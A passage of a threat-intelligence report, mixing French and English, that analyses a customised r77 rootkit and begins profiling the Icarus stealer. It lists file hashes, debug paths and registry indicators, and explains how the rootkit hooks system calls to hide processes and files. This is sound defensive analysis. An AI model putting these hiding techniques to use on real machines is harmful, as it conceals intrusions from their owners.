class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">192:\/MxThhi8bE8yM8MlrljlQ0ljgcR\/ytyLabWW:\/4fi8bE8yM8UR\/lLabW<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i 
class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Voici quelques d\u00e9tails techniques compl\u00e9mentaires :<\/p>\n<ul>\n<li>la version du framework .NET utilis\u00e9e est la v4.0.30319, plut\u00f4t ancienne (~2010), mais pr\u00e9sente syst\u00e9matiquement dans les OS Windows\u00a0;<\/li>\n<li>la date de compilation est cette fois situ\u00e9e dans le futur (6 d\u00e9cembre 2040), donc non exploitable. N\u00e9anmoins, cela permet d'indiquer que les ex\u00e9cutables n'ont pas tous \u00e9t\u00e9 compil\u00e9s de la m\u00eame fa\u00e7on, voire par plusieurs personnes diff\u00e9rentes\u00a0;<\/li>\n<li>un chemin vers le fichier de d\u00e9bogage est \u00e9galement pr\u00e9sent\u00a0: <code>C:\\Users\\dride\\Desktop\\New folder (3)\\ICARUS3-main\\ICARUS-main\\Stubs\\Stubs\\and\\rest\\Of\\mofos\\Junk\\and\\Stolen\\Code\\remove\\obj\\Release\\net40\\Install.pdb<\/code><\/li>\n<\/ul>\n<h5>Pr\u00e9sentation<\/h5>\n<p>Il s'agit du d\u00e9sinstallateur du rootkit r77. 
Le principe de d\u00e9sinstallation est minimaliste et brutal, car il consiste \u00e0 supprimer la valeur de la cl\u00e9 de registre AppInit_DLLs permettant le chargement du fichier DLL malveillant.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414137\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 18 : code de d\u00e9sinstallation du rootkit r77<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]On peut remarquer que si, lors de l'installation, trois cl\u00e9s de registres sont modifi\u00e9es, seule la cl\u00e9 <code>AppInit_DLLs<\/code> est remise \u00e0 z\u00e9ro lors de la d\u00e9sinstallation. Cela constitue un indicateur de compromission non sp\u00e9cifique de r77 mais permanent de son passage sur le syst\u00e8me. 
Par ailleurs, si la cl\u00e9 AppInit_DLLs \u00e9tait utilis\u00e9e par un autre logiciel, ce param\u00e9trage se fait retirer.<\/p>\n<p>De plus, le script de d\u00e9sinstallation ne supprime pas les fichiers DLL d\u00e9ploy\u00e9s lors de l'installation\u00a0; ils restent donc dans ce dossier de fa\u00e7on permanente.<\/p>\n<h4>Code malveillant des fichiers DLL de r77<\/h4>\n<h5>Carte d'identit\u00e9<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_5\"\n     id='ninja_table_builder_414254'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_5\"\n     style=\"\n     max-height:800px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414254\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6203977\" class=\"desktop-view tr_class_6203977 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_77241949\" rowspan=\"1\" colspan=\"1\" class=\"td_class_77241949\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_77241949\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper 
remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_31611148\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31611148\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31611148\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_76881720\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76881720\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76881720\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr 
id=\"tr_id_7428527\" class=\"desktop-view tr_class_7428527 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_15858300\" rowspan=\"1\" colspan=\"1\" class=\"td_class_15858300\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_15858300\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_74685529\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74685529\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74685529\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">C\/C++<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_84968323\" rowspan=\"1\" colspan=\"1\" class=\"td_class_84968323\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 
0);\"><div id=\"td_id_84968323\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">C\/C++<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8585352\" class=\"desktop-view tr_class_8585352 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_89249762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_89249762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_89249762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Architecture<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_41861492\" rowspan=\"1\" colspan=\"1\" class=\"td_class_41861492\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_41861492\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" 
style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">32 bits<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_58982927\" rowspan=\"1\" colspan=\"1\" class=\"td_class_58982927\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_58982927\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">64 bits<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_7148238\" class=\"desktop-view tr_class_7148238 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_78358958\" rowspan=\"1\" colspan=\"1\" class=\"td_class_78358958\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_78358958\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73737396\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73737396\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73737396\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Wed Jul 13 17:29:32 2022<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_24527891\" rowspan=\"1\" colspan=\"1\" class=\"td_class_24527891\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_24527891\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Wed Jul 13 17:29:27 2022<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_1546340\" class=\"desktop-view tr_class_1546340 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_59224734\" rowspan=\"1\" colspan=\"1\" class=\"td_class_59224734\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_59224734\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_31281813\" rowspan=\"1\" colspan=\"1\" class=\"td_class_31281813\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_31281813\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">no<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73542868\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73542868\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73542868\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">no<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_9333360\" class=\"desktop-view tr_class_9333360 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_66087210\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66087210\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66087210\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73861368\" rowspan=\"1\" colspan=\"1\" class=\"td_class_73861368\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_73861368\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">bf2ac81c25ebc55e88af9233c6c0e1b5<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_38056866\" rowspan=\"1\" colspan=\"1\" class=\"td_class_38056866\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_38056866\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">8d54e4abe1762f96134a0c874cfb8cdc<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_6362894\" class=\"desktop-view tr_class_6362894 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_83104384\" rowspan=\"1\" colspan=\"1\" class=\"td_class_83104384\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_83104384\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_84631330\" rowspan=\"1\" colspan=\"1\" class=\"td_class_84631330\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_84631330\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">096d850244c31a9d4c1da7ac3b243e3f61b503d8<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_19305833\" rowspan=\"1\" colspan=\"1\" class=\"td_class_19305833\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_19305833\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">336f3fb4baa098ea4f54d881f2a2cf696e37c44e<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_8597220\" class=\"desktop-view tr_class_8597220 \" style=\"background: rgb(255, 255, 255);\"><td id=\"td_id_78649016\" rowspan=\"1\" colspan=\"1\" class=\"td_class_78649016\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_78649016\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_44744524\" rowspan=\"1\" colspan=\"1\" class=\"td_class_44744524\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_44744524\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ed3ee849ae71001941d03983a65eacdd726be75d91b076475a89a3a75e79d82e<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_99204663\" rowspan=\"1\" colspan=\"1\" class=\"td_class_99204663\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_99204663\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e<\/span><\/div><\/div><\/div><\/td><\/tr>
<tr id=\"tr_id_6368610\" class=\"desktop-view tr_class_6368610 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_68860200\" rowspan=\"1\" colspan=\"1\" class=\"td_class_68860200\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_68860200\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_30808078\" rowspan=\"1\" colspan=\"1\" class=\"td_class_30808078\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_30808078\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24576:75+fEilGQ8Joz078UfJeOYyF42fQhz03:d+78J04r4zzW<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_18725863\" rowspan=\"1\" colspan=\"1\" class=\"td_class_18725863\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_18725863\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24576:jBm2D0GlV7LJMLMVSBsalgydd4jnYnyeiRy:M2D0mV76LMV1algAkYP<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h5>Presentation<\/h5>\n<p>Each DLL file loaded through the <code>AppInit_DLLs<\/code> mechanism contains the rootkit itself, which is responsible for hiding the malicious activity.<\/p>\n<p>To achieve this, the Detours library (<a href=\"https:\/\/github.com\/microsoft\/detours\" target=\"_blank\" rel=\"noopener\">github.com\/microsoft\/detours<\/a>) is used. It is a library for placing hooks in memory in order to redirect a program's execution flow to developer-defined functions, here for malicious purposes.<\/p>\n<h5>Hook installation<\/h5>\n<p>The <code>NtQuerySystemInformation<\/code> and <code>ZwQueryDirectoryFile<\/code> system calls are hooked:<\/p>\n<ul>\n<li>ZwQueryDirectoryFile is the function responsible for retrieving information about the files contained in a directory. This hook is used here to hide files or folders, and it is only placed in the 64-bit version of the DLL.<\/li>\n<li>NtQuerySystemInformation can, among other things, return information about running processes, so this function is modified to hide processes.<\/li>\n<\/ul>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414142\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 19: overview of the hook installation<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]We note the presence of \"only\" two hooks, whereas the most recent version of r77 on the Github.com project has around ten. As indicated by the debug file paths found in the DLL files, this is clearly a customised version of the rootkit:<\/p>\n<ul>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\x64\\Debug\\r77-x64.pdb<\/code><\/li>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\Debug\\r77-x86.pdb<\/code><\/li>\n<li><code>F:\\r77-Custom-rootkit-masterVENOM\\Install\\obj\\Debug\\Install.pdb<\/code><\/li>\n<\/ul>\n<h3>Icarus<\/h3>\n<h4>Identity card of the stealer<\/h4>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_6\"\n     id='ninja_table_builder_414272'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_6\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414272\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of
file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" 
